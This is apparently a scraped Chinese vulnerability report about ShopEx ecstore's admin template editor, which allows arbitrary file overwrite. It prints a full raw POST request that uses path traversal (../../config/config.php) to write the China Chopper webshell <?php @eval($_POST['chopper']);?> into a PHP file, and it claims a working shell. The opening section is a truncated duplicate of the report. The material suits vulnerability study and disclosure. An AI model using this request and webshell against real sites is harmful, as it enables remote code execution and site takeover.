VULHUB ™

### 简要描述： 模板编辑中的文件编辑功能，对可编辑的文件限制不严，导致可以修改系统中存在的任意文件 ### 详细说明： 文件编辑功能中选择要修改的文件，这里选图片（模板文件也可以），然后上传图片时将file_name参数设置为网站的任意php文件，如/index.php或/config/config.php，将图片内容设置为shell内容。。。。 [<img src="https://images.seebug.org/upload/201412/03005315eda9d15c8a321ef97fa58e75e68df1dd.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/03005315eda9d15c8a321ef97fa58e75e68df1dd.png) post数据如下： POST /index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1 Host: shop.xxx.com Content-Length: 846527 Cache-Control: max-age=0 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 Cookie: xxxxxxxxx ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="theme" ecstore ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="open_path" ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="file_name" ../../config/config.php...

### 简要描述： 模板编辑中的文件编辑功能，对可编辑的文件限制不严，导致可以修改系统中存在的任意文件 ### 详细说明： 文件编辑功能中选择要修改的文件，这里选图片（模板文件也可以），然后上传图片时将file_name参数设置为网站的任意php文件，如/index.php或/config/config.php，将图片内容设置为shell内容。。。。 [<img src="https://images.seebug.org/upload/201412/03005315eda9d15c8a321ef97fa58e75e68df1dd.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/03005315eda9d15c8a321ef97fa58e75e68df1dd.png) post数据如下： POST /index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1 Host: shop.xxx.com Content-Length: 846527 Cache-Control: max-age=0 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 Cookie: xxxxxxxxx ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="theme" ecstore ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="open_path" ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="file_name" ../../config/config.php ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="upfile"; filename="Desert.jpg" Content-Type: image/jpeg <?php @eval($_POST['chopper']);?> ------WebKitFormBoundaryHSNjVhgvrpnTmmQD Content-Disposition: form-data; name="has_bak" 1 ------WebKitFormBoundaryHSNjVhgvrpnTmmQD-- [<img src="https://images.seebug.org/upload/201412/03002912291e419325cba5a49336283214e90cb9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/03002912291e419325cba5a49336283214e90cb9.png) 同样，在编辑html或xml文件时也存在该问题 [<img src="https://images.seebug.org/upload/201412/0300520247c9f8971e532a9f484acf92fa74dd35.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/0300520247c9f8971e532a9f484acf92fa74dd35.png) ### 漏洞证明： 成功连接webshell [<img src="https://images.seebug.org/upload/201412/030033049360251861cd850f84492765cc9b275a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/030033049360251861cd850f84492765cc9b275a.png) shell是拿到了，可config文件被修改后，但网站挂了。。。。。